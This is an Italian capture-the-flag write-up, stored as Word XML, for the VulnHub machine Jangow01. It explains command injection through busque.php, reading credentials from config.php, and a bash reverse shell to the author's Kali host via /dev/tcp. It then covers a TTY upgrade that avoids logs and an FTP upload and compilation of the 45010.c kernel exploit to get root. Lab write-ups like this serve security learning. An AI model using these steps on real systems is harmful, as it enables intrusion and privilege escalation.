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1B618" w14:textId="6068BE8B" w:rsidR="00A9621A" w:rsidRDefault="00F65593" w:rsidP="00F65593">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r>
        <w:t>Jangow01:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FBE2CA1" w14:textId="5AE636A2" w:rsidR="00F65593" w:rsidRDefault="00F65593" w:rsidP="00F65593">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F65593">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">CTF Jangow01 </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00F65593">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>su</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00F65593">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00F65593">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>vulnhub</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00F65593">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="00F65593">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">1) </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00F65593">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Enumerazione</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00F65593">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> Servizi (porta 80 </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00F65593">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>apache</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00F65593">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> 2.4.18 | porta 21 </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00F65593">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>vsftpd</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00F65593">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> 3.0.3</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
      <w:r w:rsidRPr="00F65593">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">2) Shell </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00F65593">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>già</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00F65593">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00F65593">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>presente</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00F65593">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> con “</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00F65593">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>busque</w:t>
      </w:r>
      <w:r w:rsidR="00481BA0">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>.php</w:t>
      </w:r>
      <w:r w:rsidRPr="00F65593">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>?buscar</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00F65593">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>=”</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> e recon directories web</w:t>
      </w:r>
      <w:r w:rsidRPr="00F65593">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:br/>
        <w:t>3) Reverse shell (non TTY) www-data</w:t>
      </w:r>
      <w:r w:rsidRPr="00F65593">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:br/>
        <w:t>4) G</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>et a real shell ( script /dev/null -c bash)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:br/>
        <w:t>5) Upload via FTP payload in /</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>tmp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00F65593">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>6</w:t>
      </w:r>
      <w:r w:rsidRPr="00F65593">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">) Exploit </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00F65593">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>utilizzato</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00F65593">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>: 45010.c local privilege escalation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3EFDEA81" w14:textId="79C45012" w:rsidR="00F65593" w:rsidRPr="00F65593" w:rsidRDefault="00F65593" w:rsidP="00F65593">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r w:rsidRPr="00F65593">
        <w:t>Fase di enumerazione:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76B8A4B7" w14:textId="2DE05A69" w:rsidR="00F65593" w:rsidRDefault="00F65593" w:rsidP="00F65593">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251659264" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="3618F284" wp14:editId="7D4E4423">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="margin">
              <wp:align>right</wp:align>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>2917825</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="6276975" cy="1924050"/>
            <wp:effectExtent l="0" t="0" r="9525" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="42385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57659C2F" wp14:editId="1B305A8E">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="margin">
              <wp:align>right</wp:align>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>222250</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="6276975" cy="2724150"/>
            <wp:effectExtent l="0" t="0" r="9525" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="172310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65593">
        <w:t>le machine p</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">ossono comunicare, comincio con le mie enumerazioni tramite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nmap</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/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Trovo 2 servizi da enumerare ulteriormente.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4CE3F54B" w14:textId="5FEF60D8" w:rsidR="00481BA0" w:rsidRDefault="00481BA0" w:rsidP="00F65593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ABA62D2" wp14:editId="552E6E4B">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="margin">
              <wp:align>right</wp:align>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>6450965</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="6276975" cy="1609725"/>
            <wp:effectExtent l="0" t="0" r="9525" b="9525"/>
            <wp:wrapNone/>
            <wp:docPr id="17964494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46C1575" wp14:editId="68D8B5E6">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="margin">
              <wp:align>right</wp:align>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>-902335</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="6276975" cy="7362825"/>
            <wp:effectExtent l="0" t="0" r="9525" b="9525"/>
            <wp:wrapNone/>
            <wp:docPr id="1925466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736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t xml:space="preserve">Dovrò quindi condurre </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>recon</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> su queste pagine web trovate grazie a </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>gobuster</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> e vedere se contengono informazioni interessanti (o se ho accesso ad esse, vedremo successivamente </w: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49E36943" wp14:editId="09E2E189">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="margin">
              <wp:align>left</wp:align>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>783590</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="6086475" cy="1114425"/>
            <wp:effectExtent l="0" t="0" r="9525" b="9525"/>
            <wp:wrapNone/>
            <wp:docPr id="9537664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che dovrò bypassare le restrizioni di accesso utilizzando la shell già presente su sito).</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>vedo che posso utilizzare come shell la pagina /site/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>busque.php</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> già stabilita da CTF, posso provare a fare query sulle pagine prima a me non disponibili con l’utente www-data per trovare credenziali a noi utili. </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>Ad esempio</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>config.php</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> prima a noi non accessibile ci mostra</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">un nome utente “desafio02” ed una password “abygurl69”, che terrò a mente per la fase su </w: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A133B4E" wp14:editId="762EEB8C">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="margin">
              <wp:align>right</wp:align>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>3322955</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="6276975" cy="619125"/>
            <wp:effectExtent l="0" t="0" r="9525" b="9525"/>
            <wp:wrapNone/>
            <wp:docPr id="437298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03" t="22340" r="303" b="8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servizio ftp/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>vsftpd</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>.</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">passo quindi ad </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>un enumerazione</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> di file di interesse interni dove noto “</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>passwd</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">” contente un </w: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0F3997FD" wp14:editId="60600113">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="margin">
              <wp:align>right</wp:align>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>4464685</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="6276975" cy="600075"/>
            <wp:effectExtent l="0" t="0" r="9525" b="9525"/>
            <wp:wrapNone/>
            <wp:docPr id="3912164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altro user, jangow01.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0814F914" w14:textId="5CE93D56" w:rsidR="00481BA0" w:rsidRDefault="00481BA0" w:rsidP="00F65593"/>
    <w:p w14:paraId="5DF92617" w14:textId="64367B4C" w:rsidR="00481BA0" w:rsidRDefault="00481BA0" w:rsidP="00F65593">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251665408" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="6A161018" wp14:editId="3BD723B0">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="margin">
              <wp:align>left</wp:align>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>540385</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="6276506" cy="571500"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="20497673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01" t="9406" r="56664" b="82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148" cy="571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In quanto navigare in questo modo su target è scomodo ora invece stabilisco una reverse shell con la seguente istruzione:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3CA919D6" w14:textId="338784C5" w:rsidR="00481BA0" w:rsidRDefault="00481BA0" w:rsidP="00F65593">
      <w:pPr>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7E8FBAB6" w14:textId="0DDAB72D" w:rsidR="00CD096D" w:rsidRDefault="00CD096D" w:rsidP="00F65593">
      <w:pPr>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t>1)invoco la shell bash (bash) e istruisco il seguente comando (-c) :</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">2) bash -i (seconda bash, interattiva, che quindi si comportera come se connessa a terminale creando una shell adatta) </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">3) &gt;%26 (&gt;&amp;) (redirige lo stdout e gli stderr alla destinazione /dev/tcp/192.168.56.101/443 [kali]) </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:br/>
        <w:t>4) /dev/tcp/192.168.56.101/443 crea da se una connessione tcp con la nostra macchina kali</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:br/>
        <w:t>5) 0&gt;%261 (&gt;&amp;1) faccio in modo che lo standard input sia rindirizzato dalla connessione TCP stabilita, quindi i miei input tastiera da kali vengono interpretati.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3865BD05" w14:textId="5932B179" w:rsidR="00F65593" w:rsidRDefault="00322C56" w:rsidP="00F65593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71B03407" wp14:editId="5B8C6425">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="margin">
              <wp:posOffset>1697355</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>5184140</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="4771782" cy="2838450"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="5369838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782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096D">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251666432" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="6BA9305A" wp14:editId="457D0694">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="margin">
              <wp:align>right</wp:align>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>-930910</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="6276975" cy="2724150"/>
            <wp:effectExtent l="0" t="0" r="9525" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="6800021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81BA0">
        <w:br/>
      </w:r>
      <w:r w:rsidR="00CD096D">
        <w:br/>
      </w:r>
      <w:r w:rsidR="00CD096D">
        <w:br/>
      </w:r>
      <w:r w:rsidR="00CD096D">
        <w:br/>
      </w:r>
      <w:r w:rsidR="00CD096D">
        <w:br/>
      </w:r>
      <w:r w:rsidR="00CD096D">
        <w:br/>
      </w:r>
      <w:r w:rsidR="00CD096D">
        <w:br/>
        <w:t xml:space="preserve">catturando la reverse shell con </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00CD096D">
        <w:t>netcat</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00CD096D">
        <w:t xml:space="preserve"> ottengo </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidR="00CD096D">
        <w:t>pero</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidR="00CD096D">
        <w:t xml:space="preserve"> una shell limitata (NON-TTY) </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">che non è quindi un vero e proprio terminale su target. Dobbiamo quindi utilizzare il seguente metodo per ottenere una propria shell di </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>bash</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>:</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>script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 -c </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>bash</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">1)script invoca il comando appunto di script per creare un terminale (o meglio, uno </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>pseudoterminale</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>)</w:t>
      </w:r>
      <w:r w:rsidRPr="00322C56">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>dove creare un recordin</w:t>
      </w:r>
      <w:r>
        <w:t>g (</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">e gli istruiamo dopo di far girare </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>bash</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> su questo </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>pseudoterminale</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>)</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>2)/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 è un folder “buco nero” dove tutto viene scartato immediatamente, quindi andiamo a registrare una nostra sessione qui per evitare log ma ottenere comunque una shell </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>bash</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> adatta.</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">3) -c </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>bash</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">, come prima avviamo il comando </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>bash</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> all’interno dello </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>pseudoterminale</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> creato da “script”, così che </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>bash</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> sia imbrogliato nel credere che si sta connettendo ad un terminale effettivo, ed ora abbiamo accesso a operazioni da terminale prima a noi non consentite.</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>Come cambiare</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>utente in jangow01</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>con password</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>“abygurl69” e ottenere</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>privilegi maggiori</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>rispetto a www-data.</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">                                         #controllo dei binari con SUID settato su user</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B4E5661" w14:textId="36140A15" w:rsidR="00D75740" w:rsidRDefault="00322C56" w:rsidP="00F65593">
      <w:pPr>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/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5317CC9B" wp14:editId="54B57A68">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="margin">
              <wp:align>left</wp:align>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>3841115</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5248275" cy="1628775"/>
            <wp:effectExtent l="0" t="0" r="9525" b="9525"/>
            <wp:wrapNone/>
            <wp:docPr id="12978157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313CCFB3" wp14:editId="5F1FFD7C">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="margin">
              <wp:align>right</wp:align>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>-1083310</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="6276975" cy="4933950"/>
            <wp:effectExtent l="0" t="0" r="9525" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="18671233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t>Noto che non ho binari exploitabili, credenziali di user root, ma ho la possibilità di provare su ftp l’accesso con credenziali di jangow01 e scaricare su target un payload…</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">Proverò con pwnkit e </w:t>
      </w:r>
      <w:r w:rsidR="00D75740">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t>dirtycow, ma a funzionare sarà il 45010.c</w:t>
      </w:r>
      <w:r w:rsidR="00D75740">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:br/>
        <w:t>apro servizio ftp (sul quale avevo solo testato l’anonymous login fino ad ora) e inserisco le credenziali di jangow01, mi muovo su /tmp dove potrò liberamente agire con i miei privilegi, ed infine scelgo il payload dopo una query searchsploit per la specifica versione del kernel del target in questo caso Ubuntu 4.4.0-31 Generic…</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31F9AB4D" w14:textId="23CEA0CA" w:rsidR="00D75740" w:rsidRDefault="00D75740" w:rsidP="00F65593">
      <w:pPr>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t>Trovo le seguenti opzioni:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65D58BFF" w14:textId="77777777" w:rsidR="00D75740" w:rsidRDefault="00D75740" w:rsidP="00F65593">
      <w:pPr>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="629CE9C2" w14:textId="137CF6B1" w:rsidR="00D75740" w:rsidRDefault="00D75740" w:rsidP="00F65593">
      <w:pPr>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/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31E42A0F" wp14:editId="41E97032">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="column">
              <wp:posOffset>-173355</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>-1045210</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="6276975" cy="3067050"/>
            <wp:effectExtent l="0" t="0" r="9525" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="7286147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t>#includo i tentativi falliti su report a parte</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1AB5679F" w14:textId="1D3AA8AE" w:rsidR="00D75740" w:rsidRDefault="00D75740" w:rsidP="00F65593">
      <w:pPr>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t>con searchsploit -m 45010.c ottengo il payload da caricare su /tmp tramite connessione ftp.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42E1D306" w14:textId="6655CE5B" w:rsidR="00D75740" w:rsidRPr="00F65593" w:rsidRDefault="0001008C" w:rsidP="00F65593">
      <w:pPr>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0001008C">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251672576" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="3F425595" wp14:editId="7DEE662B">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="margin">
              <wp:align>right</wp:align>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>1748790</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="6280785" cy="3775710"/>
            <wp:effectExtent l="0" t="0" r="5715" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="53427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747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008C">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00D75740">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t>Da essa vado su /tmp (cd /tmp) e utilizzo: put /home/kali/45010.c 45010.c, verifico da reverse shell se il payload è stato correttamente spedito su folder /tmp. In quanto 45010.c è solo il codice sorgente era necessario compilarlo, posso farlo tramite:</w:t>
      </w:r>
      <w:r w:rsidR="00D75740">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:br/>
        <w:t>gcc -o exploit 45010.c (che lo compila come ‘exploit’ in output)</w:t>
      </w:r>
      <w:r w:rsidR="00D75740">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:br/>
        <w:t>chmod +x exploit  (che setta il bit di esecuzione sul binario)</w:t>
      </w:r>
      <w:r w:rsidR="00D75740">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:br/>
        <w:t>./exploit (esegue l’exploit, e ottengo una shell root)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lastRenderedPageBreak/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5371DC54" wp14:editId="64566309">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="page">
              <wp:align>right</wp:align>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>-835660</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="7462626" cy="3057525"/>
            <wp:effectExtent l="0" t="0" r="5080" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="721293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2626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su target trovo la flag finale che contiene un codice hash SHA1 che con hascat cracco e rivela la parola “iheartyou” (troavata precedentemente pure in hash md5 come prima flag)</w:t>
